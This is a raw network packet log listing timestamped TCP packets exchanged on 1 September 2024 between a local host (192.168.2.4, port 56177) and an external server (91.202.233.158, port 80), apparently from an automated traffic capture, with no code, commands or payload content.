Sep 1, 2024 18:28:23.153630018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153637886 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153646946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153656960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153666973 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153675079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153681040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153692007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153702974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153708935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153721094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153740883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153881073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153891087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153901100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153911114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153918982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.153924942 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153939962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.153954029 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154033899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154043913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154053926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154064894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154072046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154088020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154103994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154252052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154261112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154275894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154285908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154297113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154304981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154314041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154320955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154333115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154341936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154350042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154362917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154371023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154381990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154392958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154412031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154426098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154506922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154519081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154547930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154652119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154663086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154673100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154680967 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154690027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154697895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154706955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154714108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154726028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154731989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154741049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154747009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154756069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154762983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154777050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154782057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.154792070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154815912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.154997110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155006886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155016899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155028105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155039072 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155052900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155061007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155066013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155073881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155087948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155092955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155103922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155109882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155117989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155128002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155138969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155144930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155158043 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155162096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155173063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155179024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155191898 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155198097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155208111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155225039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155457020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155514002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155540943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155545950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155550003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155555010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155556917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.155574083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.155592918 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166507006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166517973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166526079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166555882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166569948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166578054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166588068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166598082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166603088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166615963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166620016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166634083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166655064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166682005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166771889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166781902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166791916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166800976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166807890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166816950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.166830063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.166843891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167016029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167023897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167032957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167042971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167049885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167062044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167066097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167073965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167083979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167089939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167095900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167112112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167124033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167270899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167309046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167459011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167469978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167479038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167488098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167495012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167501926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167510033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167516947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167526007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167532921 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167541027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167546988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167556047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167566061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167571068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167578936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167587996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167596102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167603016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167609930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167633057 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167769909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167778969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167788982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167812109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167826891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.167987108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.167995930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168004990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168015957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168029070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168036938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168045998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168051958 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168061018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168066978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168075085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168086052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168093920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168101072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168119907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168124914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168132067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.168138027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.168164968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240454912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240467072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240477085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240494967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240504980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240514040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240525007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240541935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240550041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240559101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240570068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240581036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240590096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240597963 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240607023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240617990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240624905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240632057 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240641117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240652084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240659952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240668058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240679979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240685940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240695953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240701914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240710974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240720987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240729094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240739107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240748882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240755081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240766048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240777016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240802050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240818024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240823984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240833044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240844011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240856886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.240871906 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.240881920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241075993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241086006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241096973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241107941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241118908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241131067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241144896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241149902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241158009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241169930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241178989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241185904 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241194963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241213083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241239071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241388083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241398096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241409063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241420031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241430044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241437912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241447926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241471052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241487026 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241643906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241652966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241664886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241677046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241687059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241697073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241704941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241714954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241724968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241733074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241740942 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241765022 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241938114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241946936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241955996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241966009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.241986036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.241993904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242005110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242010117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.242019892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242027044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.242034912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242048025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242053032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.242062092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242073059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.242078066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.242096901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.242120028 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253540993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253550053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253559113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253590107 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253599882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253609896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253614902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253652096 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253705978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253715992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253725052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253735065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253746033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253751993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253767014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253781080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253797054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253807068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253820896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253829956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253835917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253849983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253859997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253879070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.253896952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.253937006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254003048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254040003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254059076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254070044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254077911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254087925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254095078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254101992 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254115105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254128933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254759073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254770041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254779100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254793882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254801989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254811049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254823923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254832029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254846096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254851103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254859924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254869938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254877090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254889011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254895926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254915953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254937887 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.254971981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254981041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.254991055 CEST	80	56177	91.202.233.158	192.168.2.4
